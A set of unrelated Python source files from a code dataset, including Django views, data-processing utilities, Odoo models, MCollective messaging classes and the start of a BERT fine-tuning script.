HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef getaveragemasterybysubjectallclass(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n averagemasterybysubject = Query.get_average_mastery_by_subject_of_all_class(teacherkey)\n logging.error(averagemasterybysubject)\n t = loader.get_template('Dashboard/averagemasterybysubject_allclass.xml')\n c = Context({'averagemasterydict': averagemasterybysubject,})\n return 
HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_classes_of_teacher(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n classdetails = Query.get_class_details_of_teacher(teacherkey)\n\n t = loader.get_template('Dashboard/getclassdetails_byteacher')\n c = Context({'getclassdetailsdict': classdetails,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_students_not_logged_in_by_class(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['id']\n classkey = ndb.Key(urlsafe=key)\n notrecentlyloggedin = Query.get_students_not_logged_in_by_class(teacherkey,classkey)\n\n t = loader.get_template('Dashboard/notrecentlyloggedin_byclass')\n c = Context({'notrecentlyloggedinbyclass': notrecentlyloggedin,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef getaveragemasterybysubjectallsubject(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['id']\n classkey = ndb.Key(urlsafe=key)\n averagemasterybysubject = Query.get_average_mastery_all_subject_detailed(teacherkey,classkey)\n logging.error(averagemasterybysubject)\n t = loader.get_template('Dashboard/averagemasterybysubject_allsubject')\n c = Context({'averagemasterydict': averagemasterybysubject,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\n\ndef get_assessment_coverage_of_class(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['id']\n classkey = ndb.Key(urlsafe=key)\n assessmentcoveragedict = Query.get_assessment_coverage_of_class(teacherkey,classkey)\n logging.error(\"&&&&&&&&&&&&&&&&&&777\"+str(assessmentcoveragedict))\n t = loader.get_template('Dashboard/assessmentcoveragebyclass')\n c = Context({'assessmentcoveragedict': assessmentcoveragedict,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_subject_of_class(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['id']\n classkey = ndb.Key(urlsafe=key)\n logging.error(classkey)\n subjectdict = Query.get_subject_details_of_teacher_in_class(teacherkey,classkey)\n t = loader.get_template('Dashboard/getsubjectofclass')\n c = Context({'getsubjectofclass': subjectdict,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_readytolearn_of_subject(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['classid']\n classkey = ndb.Key(urlsafe=key)\n key = request.GET['subjectid']\n subjectkey = ndb.Key(urlsafe=key)\n logging.error(\"99999999999999999999999999999999\")\n readytolearn = Query.get_ready_to_learn_of_class(teacherkey,classkey,subjectkey)\n t = loader.get_template('Dashboard/readytolearn_ofsubjectofclass')\n c = Context({'readytolearndict': readytolearn,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_assessment_coverage_of_subject(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['classid']\n classkey = ndb.Key(urlsafe=key)\n key = request.GET['subjectid']\n subjectkey = ndb.Key(urlsafe=key)\n assessmentcoveragedict = Query.get_assessment_coverage_of_subject(teacherkey,classkey,subjectkey)\n logging.error(\"101010\"+str(assessmentcoveragedict))\n t = loader.get_template('Dashboard/assessmentcoverageofsubject')\n c = Context({'assessmentcoveragedict': assessmentcoveragedict,})\n return 
HttpResponse(t.render(c),content_type=\"text/xml\")\n\n\ndef get_averagemastery_of_subject_topicwise(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['classid']\n classkey = ndb.Key(urlsafe=key)\n key = request.GET['subjectid']\n subjectkey = ndb.Key(urlsafe=key)\n averagemasteryofsubject = Query.get_average_mastery_of_a_subject(teacherkey,classkey,subjectkey)\n logging.error(averagemasteryofsubject)\n t = loader.get_template('Dashboard/averagemasteryofsubjecttopicwise')\n c = Context({'averagemasterydict': averagemasteryofsubject,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\n","sub_path":"AssessingPie/teacher_dashboard_data.py","file_name":"teacher_dashboard_data.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"295171598","text":"import re\nimport sklearn as skl\nimport sklearn.preprocessing\n\ndef vectorize(data, label_column, features=[('time', 0), ('day', 0), ('month', 0), ('year', 0), ('day_of_week', 0), ('latitude', 7), ('longitude', 8)]):\n\t'''Generator function that extracts and returns a selectible set of features for each data point in the data parameter.\n\t\n\tReturns a vector containing values for the selected features. The order in the features parameter is indicative of the order in\n\tthe resulting vector (except when using the 'streets' feature, see below).\n\t\n\tdata\n\tdata is a sequence of subscriptables. Each subscriptable usually represents a line read from a .csv file.\n\t\n\tlabel_column\n\tlabel_column is None if the data is unlabeled. Otherwise, it is the index under which the label is found in each subscriptable.\n\tThe label is assumed to be a string and will be mapped to an integer unique to each unique string. This integer is appended as the\n\tlast element in the output vector.\n\tThere is one more thing about this parameter. If it is not none, the first element yielded by this generator function is a dictionary\n\tthat maps crime type strings to unambiguous ids. It is empty until more elements are extracted from this generator.\n\t\n\tfeatures\n\tfeatures is an iterable of 2-tuples (feature, index). It indicates\n\t- which features to extract (first part of each tuple)\n\t- under which index information needed for that feature is found (second part of each tuple)\n\t- in which order to place the features in the resulting feature vector (given by the order in the iterable)\n\t\n\tAvailable features are: 'time', 'day', 'month', 'year', 'day_of_week', 'latitude', 'longitude', 'streets'.\n\tThe features 'time', 'day', 'month', 'year' and 'day_of_week' are extracted from a time.struct_time object, so their associated\n\tindex in the (feature, index) tuple is usually identical. 'latitude' and 'longitude' are expected to be floats and are used 'as is'.\n\t\n\tThe 'streets' feature is a bit special in that it doesn't produce a single value in the output vector, but three. There are two types\n\tof street designation formats in the data set:\n\t- STREET_1 / STREET_2\n\t- Xth block of STREET\n\tIn the former case, two unique ids for the streets are appended to the output vector, followed by a -1. 
In the latter case, the street\n\tid and then the block number is appended to the vector, followed by a +1.\n\t'''\n\t\n\tstreet_type_1 = re.compile(r'(.+) / (.+)') # Regular expression to recognize street designations of the form 'STREET_1 / STREET_2'\n\tstreet_type_2 = re.compile(r'(.+) Block of (.+)') # as above, for ' Xth block of STREET'\n\tcrime_type_ids = {} # Dictionary unambiguously mapping crime type strings to integer ids\n\tcrime_type_counter = 0 # Counts how many different types of crime have been found.\n\tstreet_ids = {} # Dictionary unambiguously mapping street name strings to integer ids\n\tstreet_counter = 0 # Counts how many unique street names have been found.\n\t\n\t# Provide caller with the dictionary if appropriate.\n\tif label_column is not None:\n\t\tyield crime_type_ids\n\n\tfor data_point in data:\n\t\t# Get crime id from dictionary, or make new one if neccessary.\n\t\tif label_column is not None:\n\t\t\ttry:\n\t\t\t\tcrime_type_id = crime_type_ids[data_point[label_column]]\n\t\t\texcept KeyError:\n\t\t\t\tcrime_type_ids[data_point[label_column]] = crime_type_counter\n\t\t\t\tcrime_type_counter += 1\n\t\t\t\tcrime_type_id = crime_type_ids[data_point[label_column]]\n\t\t\n\t\t# Create vector and append all requested features\n\t\tvec = []\n\t\tfor feature, column in features:\n\t\t\tif feature == 'time':\n\t\t\t\ttime = data_point[column].tm_hour * 60 + data_point[column].tm_min # Time in minutes since 00:00\n\t\t\t\tvec.append(time)\n\t\t\telif feature == 'day':\n\t\t\t\tday = data_point[column].tm_mday\n\t\t\t\tvec.append(day)\n\t\t\telif feature == 'month':\n\t\t\t\tmonth = data_point[column].tm_mon\n\t\t\t\tvec.append(month)\n\t\t\telif feature == 'year':\n\t\t\t\tyear = data_point[column].tm_year\n\t\t\t\tvec.append(year)\n\t\t\telif feature == 'day_of_week':\n\t\t\t\tvec.append(data_point[column].tm_wday)\n\t\t\telif feature == 'latitude':\n\t\t\t\tvec.append(data_point[column])\n\t\t\telif feature == 'longitude':\n\t\t\t\tvec.append(data_point[column])\n\t\t\telif feature == 'streets':\n\t\t\t\ttype1_match = street_type_1.match(data_point[column])\n\t\t\t\tif type1_match is not None: # Street designation is of the form 'STREET_1 / STREET_2'\n\t\t\t\t\tstreet1, street2 = type1_match.group(1, 2) # fetch components\n\t\t\t\t\tif street1 not in street_ids: # Get / create street id\n\t\t\t\t\t\tstreet_ids[street1] = street_counter\n\t\t\t\t\t\tstreet_counter += 1\n\t\t\t\t\tif street2 not in street_ids: # Get / create street id\n\t\t\t\t\t\tstreet_ids[street2] = street_counter\n\t\t\t\t\t\tstreet_counter += 1\n\t\t\t\t\ts1_id = street_ids[street1]\n\t\t\t\t\ts2_id = street_ids[street2]\n\t\t\t\t\tvec.append(s1_id)\n\t\t\t\t\tvec.append(s2_id)\n\t\t\t\t\tvec.append(-1)\n\t\t\t\telse: # Street designation is of the form 'Xth block of STREET'\n\t\t\t\t\ttype2_match = street_type_2.match(data_point[column])\n\t\t\t\t\tif type2_match is not None:\n\t\t\t\t\t\tblock, street = type2_match.group(1, 2) # fetch components\n\t\t\t\t\t\tblock = int(block)\n\t\t\t\t\t\tif street not in street_ids: # Get / create street id\n\t\t\t\t\t\t\tstreet_ids[street] = street_counter\n\t\t\t\t\t\t\tstreet_counter += 1\n\t\t\t\t\t\ts_id = street_ids[street]\n\t\t\t\t\t\tvec.append(s_id)\n\t\t\t\t\t\tvec.append(block)\n\t\t\t\t\t\tvec.append(1)\n\t\t\t\t\telse: # Street designation is in neither format\n\t\t\t\t\t\traise 'Unknown street format: {0}'.format(data_point[6])\n\t\t\telse: # Caller has requested an unknown feature\n\t\t\t\traise 'Feature not supported!'\n\t\t\n\t\t# If data is 
labeld, append vectorized data as last element\n\t\tif label_column is not None:\n\t\t\tvec.append(crime_type_id)\n\t\t\n\t\tyield vec\n\ndef remove_outliers(data, lat_index, long_index):\n\t'''Generator function that yields every item in the sequence data, if it is within the specified coordinates.'''\n\t# define outermost coordinates\n\tSOUTH = {'y': 37.696850, 'x': -122.440464}\n\tEAST = {'y': 37.764893, 'x': -122.347306} \n\tNORTH = {'y': 37.839763, 'x': -122.424554}\n\tWEST = {'y': 37.728356, 'x': -122.535908}\n\t\n\tfor data_point in data:\n\t\tif data_point[lat_index] < WEST['x'] \\\n\t\tor data_point[lat_index] > EAST['x'] \\\n\t\tor data_point[long_index] < SOUTH['y'] \\\n\t\tor data_point[long_index] > NORTH['y']:\n\t\t\tcontinue # data point is out of bounds, skip it\n\t\t\n\t\tyield data_point\n\ndef ensure_unit_variance(data, columns_to_normalize):\n\t'''Returns a version of data where all indicated columns are made to be mean-free and have unit variance.\n\t\n\tdata is a numpy array of shape (#samples, #features)\n\tcolumns_to_normalize is an iterable of column indices\n\t'''\n\tscaled_data = skl.preprocessing.scale(data)\n\t\n\tnew_data = data.copy()\n\tfor column in columns_to_normalize:\n\t\tnew_data[:,column] = scaled_data[:,column]\n\treturn new_data\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"project/src/data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":6686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"184950784","text":"\"\"\"\nSnippets of useful code\n\nCreated: 10/14/2017\nUpdates: 10/14/2017\nAuthor: Frank J Genova\n\n\"\"\"\n\nimport sys\n\nclass VersionSnips(object):\n \"\"\"\n methods used to handle version checking,\n useful in working with environments and debugging modes\n \"\"\"\n\n def test_python_version(self, major=3, minor=6, micro=2):\n \"\"\"\n checks current Python version,\n will only display vesion if other than defaults\n \"\"\"\n\n v = sys.version_info\n if v.major != major or v.minor != minor or v.micro != micro:\n major = v.major\n minor = v.minor\n micro = v.micro\n print('='*40)\n print('WARNING: Using Python {}.{}.{}'.format(major, minor, micro))\n print('='*40)\n else:\n return True\n\nif __name__ == '__main__':\n running_version = VersionSnips()\n running_version.test_python_version(3,6,2)\n \n ","sub_path":"Py_Other/snippy.py","file_name":"snippy.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"50344501","text":"'''\n@author: Jake Ross\n@copyright: 2009\n@license: Educational Community License 1.0\n'''\n#=============enthought library imports=======================\nfrom enthought.traits.api import HasTraits, Event, Any, Str, Float, Bool, List, Enum\nfrom enthought.traits.ui.api import View, Item, HGroup, VGroup, TableEditor, ButtonEditor, EnumEditor\nfrom enthought.traits.ui.table_column import ObjectColumn\nfrom enthought.traits.ui.extras.checkbox_column import CheckboxColumn\n#=============standard library imports ========================\n\n#=============local library imports ==========================\nclass Streams(HasTraits):\n '''\n G{classtree}\n '''\n parent = Any\n name = Str\n include = Bool(False)\n delay = Float(1.0)\n _type = Enum('scatter', 'line')\n\n #options=Enum('a','b','c')\n\n\nclass StreamLoader(HasTraits):\n '''\n G{classtree}\n '''\n streams = List\n save_data = Bool(True)\n default_path = Bool(True)\n '''\n '''\n save_type = 
Enum('txt', 'h5')\n\n show_hide = Event\n label = Str('Include All')\n state = Bool\n\n time_units = 1\n def _show_hide_fired(self):\n '''\n '''\n self.state = not self.state\n\n for c in self.streams:\n c.include = self.state\n\n self.label = 'Exclude All' if self.state else 'Include All'\n\n def add_stream(self, parent):\n '''\n @_type parent: C{str}\n @param parent:\n '''\n s = Streams(parent = parent, name = parent.name)\n self.streams.append(s)\n\n def traits_view(self):\n '''\n '''\n cols = [\n ObjectColumn(name = 'name'),\n CheckboxColumn(name = 'include'),\n ObjectColumn(name = 'delay'),\n ObjectColumn(name = '_type')\n ]\n table_editor = TableEditor(columns = cols)\n v = View(VGroup(\n HGroup(\n Item('save_data'),\n Item('default_path', visible_when = 'save_data'),\n Item('save_type', visible_when = 'save_data', show_label = False)\n ),\n HGroup(Item('time_units', editor = EnumEditor(values = {1:'seconds', 60:'minutes', 3600:'hours'})), springy = False),\n Item('streams', show_label = False, editor = table_editor, height = 75),\n HGroup(\n Item('show_hide', editor = ButtonEditor(label_value = 'label'),\n show_label = False,\n springy = False\n )\n )\n ),\n height = 500,\n width = 100,\n resizable = True,\n #title = 'Select Streams',\n buttons = ['OK', 'Cancel'])\n return v\n","sub_path":"src/managers/stream_loader.py","file_name":"stream_loader.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"32793721","text":"\n\"\"\"f we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.\n\nFind the sum of all the multiples of 3 or 5 below 1000.\"\"\"\n\ndef multiplu(i):\n \n #main condition\n \n if (i%3==0)or(i%5==0):\n \n return True\n \n \n\ndef main():\n s=0;\n \n #counting\n \n for i in range(1000): \n if multiplu(i): s+=i;\n \n print(s)\n \nif __name__==\"__main__\":\n main();\n \n","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"548687209","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass shop_type(models.Model):\n\t_name = 'shop.type'\n\tname = fields.Char(string=\"Name\")\n\n\n\nclass city_city(models.Model):\n\t_name = 'city.city'\n\tname = fields.Char(string=\"Name\")\n\n\nclass res_branch(models.Model):\n\t_inherit='res.branch'\n\n\tcountry_code = fields.Char(string=\"Counter code\", size=12)\n\treg_key = fields.Char(string=\"Registration Key\")\n\tcustomer_care = fields.Many2one('hr.employee', string=\"Customer Care\")\n\tcity = fields.Many2one('city.city',string=\"City\")\n\tshoptype_id = fields.Many2one('shop.type', string=\"Shop Type\")\n\tsize_counter = fields.Char(string=\"Size Counter\")\n\tcategory_mall = fields.Selection(\n\t\tselection=[('a', 'A'),\n\t\t\t\t\t('b', 'B'),('c', 'C')],\n\t\tstring='Category Mall',\n\t\tdefault='a',\n\t)\n\tlocation = fields.Char(string=\"Location\")\n\temail = fields.Char(string=\"Email\")\n\tpic_id = fields.Many2one('hr.employee',string=\"PIC\")\n\tdescription = fields.Char(string=\"Description\")\n\topen_date = fields.Date(string=\"Open Date\")\n\tclose_date = fields.Date(string=\"Close Date\")\n\tactive = fields.Boolean(default=True)\n\tis_warehouse = fields.Boolean('Is A Warehouse', default=True)\n\n\nclass Saleorder(models.Model):\n\t_inherit = 'sale.order'\n\n\tbranch_id = fields.Many2one('res.branch', 
'Branch', required=False)\n\n\nclass PurchaseOrder(models.Model):\n\t_inherit = 'purchase.order'\n\n\tbranch_id = fields.Many2one('res.branch', 'Branch', required=False)","sub_path":"beta-dev1/pdp_modifier_branch/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"580071156","text":"# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import render, redirect\n\n\n\n# Importamos una clase\nfrom django.http import HttpResponse\n\nfrom django.core.urlresolvers import reverse_lazy\n\nfrom django.views.generic import ListView, CreateView, UpdateView, DeleteView\n\n# Importamos el formulario que creamos\nfrom app.mascota.form import MascotaForm \n\n# Importamos el modelo\nfrom app.mascota.models import Mascota\n\n# Create your views here.\ndef index(request):\n\treturn render(request, 'mascota/index.html')\n\n\n# Creamos una vista (esta es basada en función)\ndef mascota_view(request):\n\t# Si el request es un POST\n\tif request.method == 'POST':\n\t\t# se va a recibir los datos que estan mandando en el post de nuestro formulario\n\t\tform = MascotaForm(request.POST)\n\t\t# consultados si los datos mandados son válidos se guardan esos datos\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t# si pasa vamos a redirigir con el shortcut redirect (hay que importarlos) a una url usamos el espacio de nombre que ya habíamos definido\n\t\treturn redirect('mascota:index')\n\telse:\n\t\t# si no es post no volvemos al formulario\n\t\tform = MascotaForm()\n\t# Por último mandamos la respuesta que es un request (sin olvidar de pasar el contexto en un diccionario)\n\treturn render (request, 'mascota/mascota_form.html', {'form':form})\n\n#----------------------------------------------------------------------------------------\n#----------------------------------------------------------------------------------------\n\t\t\t\t\t# VISTAS BASADAS EN CLASE (importante importar las views.generic)\n#----------------------------------------------------------------------------------------\n#----------------------------------------------------------------------------------------\n\n# Vista para Listar Registros\n\nclass MascotaList(ListView):\n\t# indicamos cual es el modelo\n\tmodel = Mascota \n\t# indicamos a que template enviamos el contexto\n\ttemplate_name = 'mascota/mascota_list.html'\n\n# Vista para Crear Registros\n\nclass MascotaCreate(CreateView):\n\tmodel = Mascota\n\tform_class = MascotaForm\n\ttemplate_name = 'mascota/mascota_form.html'\n\tsuccess_url = reverse_lazy('mascota:mascota_listar')\n\t\n# Vista para actualizar\nclass MascotaUpdate(UpdateView):\n\tmodel = Mascota\n\tform_class = MascotaForm\n\ttemplate_name = 'mascota/mascota_form.html'\n\tsuccess_url = reverse_lazy('mascota:mascota_listar')\n\n# Vista para eliminar\nclass MascotaDelete(DeleteView):\n\tmodel = Mascota\n\ttemplate_name = 'mascota/mascota_delete.html'\n\tsuccess_url = reverse_lazy('mascota:mascota_listar')\n\n\n\n","sub_path":"refugio/app/mascota/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"177607566","text":"import pandas as pd , math,numpy as np, csv, sqlite3 , time\ntic = time.perf_counter() #starting the timer\n\n#loading datasets from csv files\ndataset_A = 
pd.read_csv(\"../dataset_A.csv\",index_col=False,names=[\"id\",\"name\",\"website\",\"phone\",\"code\",\"postal_code\",\"address\",\"country\"])\ndataset_B = pd.read_csv(\"../dataset_B.csv\",index_col=False,names=[\"id\",\"name\",\"website\",\"phone\",\"code\",\"postal_code\",\"address\",\"country\"])\n\n#converting website & name columns to str and making sure they are in lowercase\ndataset_A.website=dataset_A.website.astype(str).apply(lambda f: f.lower())\ndataset_A.name=dataset_A.name.apply(lambda f: f.lower()).astype(str)\ndataset_B.website=dataset_B.website.astype(str).apply(lambda f: f.lower())\ndataset_B.name=dataset_B.name.astype(str).apply(lambda f: f.lower())\n\n#looping through the first dataset_A\nfor index,row in dataset_A.iterrows():\n #testing if the current row from dataset_A appears in dataset_B\n if((row['name']!=\"nan\" and row['name']!=\"\") or (row['website']!=\"nan\" and row['website']!=\"\")) :\n matches = dataset_B.loc[ (row[\"name\"] == dataset_B[\"name\"])\n & (row[\"website\"] == dataset_B[\"website\"] )\n ]\n if matches.size > 0:\n #writing the result to a csv file\n with open('result.csv','a',newline='') as csvfile:\n fieldnames = ['source_A','source_B']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n for ind,join in matches.iterrows():\n print(row[\"name\"]+\" matches with \"+join[\"name\"])\n writer.writerow({\"source_A\":row[\"id\"] , \"source_B\" : join[\"id\"]}) \ntoc = time.perf_counter()\nprint(f\"computed matches in {toc - tic:0.4f} seconds\")\n\n","sub_path":"matching/matching/match_to_csv.py","file_name":"match_to_csv.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"183035658","text":"import bootcamp_utils\r\n\r\ndef numbers_negatives(seq):\r\n \"\"\"Number of negative residues in a protein sequence\"\"\"\r\n seq = seq.upper()\r\n \r\n for am_ac in seq:\r\n if am_ac not in bootcamp_utils.aa:\r\n raise RuntimeError(f'{am_ac} is not a valid amino acid')\r\n \r\n return seq.count('D') + seq.count('E')","sub_path":"day2_Antoine/seq_features.py","file_name":"seq_features.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"126356014","text":"import pandas as pd\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.feature_extraction.text import CountVectorizer\n\ndef acci_type(acci,data):\n top=31\n my_acci=acci\n\n data.loc[len(data)] = [my_acci,'None']\n\n count_vector = CountVectorizer(ngram_range=(1,3))\n c_vector_title = count_vector.fit_transform(data['input'])\n\n title_c_sim = cosine_similarity(c_vector_title, c_vector_title).argsort()[:,::-1]\n\n target_type_index = data[data['input'] == my_acci].index.values\n\n sim_index = title_c_sim[target_type_index, :top].reshape(-1)\n sim_index = sim_index[sim_index != target_type_index]\n result = data.iloc[sim_index]\n best_type = result['output'].value_counts().head(3)\n \n top_3={}\n l=1\n for i in best_type.index:\n top_3[l]=i\n l+=1\n \n return top_3\n","sub_path":"acci_type/type.py","file_name":"type.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"191512650","text":"'''pymco messaging objects'''\nimport collections\nimport hashlib\nimport time\n\nimport six\n\nfrom . import exc\n\n\nclass Filter(collections.Mapping):\n '''Provides MCollective filters for pymco. 
This class implements\n :py:class:`collections.Mapping` interface, so it can be used as non mutable\n mapping (read only dict), but mutable using provided add methods. So that,\n for adding the agent you can just use :py:meth:`add_agent`::\n\n filter.add_agent('package')\n '''\n def __init__(self):\n self._filter = {\n 'cf_class': [],\n 'agent': [],\n 'fact': [],\n 'identity': [],\n 'compound': [],\n }\n\n def add_cfclass(self, klass):\n '''Adds new classes/recipes/cookbooks/roles applied by your\n configuration management system.'''\n self._filter['cf_class'].append(klass)\n return self\n\n def add_agent(self, agent):\n '''Adds new agents'''\n self._filter['agent'].append(agent)\n return self\n\n def add_fact(self, fact, value, operator=None):\n '''Adds new facts'''\n toappend = {':fact': fact, ':value': value}\n if operator:\n if not operator in ('==', '=~', '<=', '=>', '>=', '=<', '>', '<',\n '!='):\n raise exc.BadFilterFactOperator(\n 'Unsuppoerted operator {0}'.format(operator))\n toappend[':operator'] = operator\n self._filter['fact'].append(toappend)\n return self\n\n def add_identity(self, identity):\n '''Adds new identities'''\n self._filter['identity'].append(identity)\n return self\n\n def __getitem__(self, key):\n return self._filter[key]\n\n def __len__(self):\n return len(self._filter)\n\n def __iter__(self):\n return six.iterkeys(self._filter)\n\n\nclass Message(collections.MutableMapping):\n '''Provides MCollective messages for pymco. This class implements\n :py:class:`collections.MutableMapping` interface, so it can be used as\n read/write mapping (dictionary).'''\n def __init__(self, body, agent, config, filter_=None, **kwargs):\n if not filter_:\n filter_ = Filter()\n\n self._message = {}\n try:\n self._message[':senderid'] = config['identity']\n self._message[':collective'] = (kwargs.get('collective', None) or\n config['main_collective'])\n except KeyError as error:\n raise exc.ImproperlyConfigured(error)\n self._message[':msgtime'] = int(time.time())\n self._message[':ttl'] = (kwargs.get('ttl', None) or\n config.getint('ttl', default=60))\n self._message[':requestid'] = hashlib.sha1(\n str(self._message[':msgtime']).encode('utf-8')).hexdigest()\n self._message[':body'] = body\n self._message[':agent'] = agent\n self._message[':filter'] = dict(filter_)\n\n def __len__(self):\n return len(self._message)\n\n def __iter__(self):\n return six.iterkeys(self._message)\n\n def __getitem__(self, key):\n return self._message[key]\n\n def __setitem__(self, key, value):\n if not key.startswith(':'):\n raise ValueError('Keys must start with `:`, as Ruby symbols.')\n\n if key == ':filter':\n value = dict(value)\n self._message[key] = value\n\n def __delitem__(self, key):\n del self._message[key]\n","sub_path":"pymco/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"492905149","text":"'''update an ENVI header file:\n - band names portion\n - image dimensions or number of bands\n(updated 20220324)'''\nimport os\nimport sys\nfrom misc import *\nargs = sys.argv\nsep = os.path.sep\nexists = os.path.exists\npd = sep.join(__file__.split(sep)[:-1]) + sep\n\nif len(args) < 6:\n err('envi_header_modify.py [.hdr file to modify] [nrow] [ncol] [nband] [band 1 name]... 
[band n name]')\n\nnrow, ncol, nband = args[2], args[3], args[4]\nif not exists(args[1]): \n err('please check input files:\\n\\t' + args[1] + '\\n\\t' + args[2])\n\n# need to run this first to make sure the band name fields are where we expect!\nif len(args) < int(nband) + 5:\n run('python3 ' + pd + 'envi_header_cleanup.py ' + args[1])\nlines = open(args[1]).read().strip().split('\\n')\n\ndef get_band_names_lines(hdr):\n idx = get_band_names_line_idx(hdr)\n lines = open(hdr).readlines()\n return [lines[i] for i in idx], idx\n[bn1, ix1] = get_band_names_lines(args[1])\n\nlines_new = []\nfor i in range(0, len(lines)):\n line = lines[i] # for every line in the output file...\n \n w = [x.strip() for x in line.split('=')]\n if len(w) > 1:\n if w[0] == 'samples': line = 'samples = ' + ncol\n if w[0] == 'lines': line = 'lines = ' + nrow\n if w[0] == 'bands': line = 'bands = ' + nband\n\n if i not in ix1: # if it's a band-names line!\n lines_new.append(line)\n\n# write new header file\nbn_new = args[5: 5 + int(nband)]\nif len(bn_new) != int(nband):\n err('inconsistent input')\n\nlines_new += ['band names = {' + bn_new[0]]\nprint([bn_new[0]])\nfor i in range(1, len(bn_new)):\n lines_new[-1] += ','\n print([bn_new[i]])\n lines_new += [bn_new[i]]\nlines_new[-1] += '}'\nprint('+w', args[1])\nopen(args[1], 'wb').write('\\n'.join(lines_new).encode())\n","sub_path":"py/envi_header_modify.py","file_name":"envi_header_modify.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"476421959","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport csv\nimport json\nimport os\nimport time\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom bert import modeling\nfrom bert import optimization\nfrom bert import tokenization\n\nMIN_FLOAT = -1e30\n\nflags = tf.flags\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string(\"bert_config_file\", None, \"The config json file corresponding to the pre-trained BERT model.\")\nflags.DEFINE_string(\"vocab_file\", None, \"The vocabulary file that the BERT model was trained on.\")\nflags.DEFINE_string(\"data_dir\", None, \"The input data dir. Should contain the .json files for the task.\")\nflags.DEFINE_string(\"task_name\", None, \"The name of the task to train.\")\nflags.DEFINE_string(\"output_dir\", None, \"The output directory where the model checkpoints will be written.\")\nflags.DEFINE_string(\"export_dir\", None, \"The export directory where the saved model will be written.\")\n\nflags.DEFINE_string(\"init_checkpoint\", None, \"Initial checkpoint (usually from a pre-trained BERT model).\")\nflags.DEFINE_bool(\"do_lower_case\", True, \"Whether to lower case the input text. True for uncased models and False for cased models.\")\n\nflags.DEFINE_integer(\"random_seed\", 100, \"Random seed for weight initialzation.\")\nflags.DEFINE_string(\"predict_tag\", None, \"Predict tag for predict result tracking.\")\n\nflags.DEFINE_integer(\n \"max_seq_length\", 128,\n \"The maximum total input sequence length after WordPiece tokenization. 
\"\n \"Sequences longer than this will be truncated, and sequences shorter than this will be padded.\")\n\nflags.DEFINE_bool(\"do_train\", False, \"Whether to run training.\")\nflags.DEFINE_bool(\"do_eval\", False, \"Whether to run evaluation.\")\nflags.DEFINE_bool(\"do_predict\", False, \"Whether to run prediction.\")\nflags.DEFINE_bool(\"do_export\", False, \"Whether to run exporting.\")\n\nflags.DEFINE_integer(\"train_batch_size\", 32, \"Total batch size for training.\")\nflags.DEFINE_integer(\"eval_batch_size\", 8, \"Total batch size for eval.\")\nflags.DEFINE_integer(\"predict_batch_size\", 8, \"Total batch size for predict.\")\n\nflags.DEFINE_float(\"learning_rate\", 5e-5, \"The initial learning rate for Adam.\")\nflags.DEFINE_float(\"num_train_epochs\", 3.0, \"Total number of training epochs to perform.\")\nflags.DEFINE_float(\"warmup_proportion\", 0.1, \"Proportion of training to perform linear learning rate warmup for.\")\n\nflags.DEFINE_integer(\"save_checkpoints_steps\", 1000, \"How often to save the model 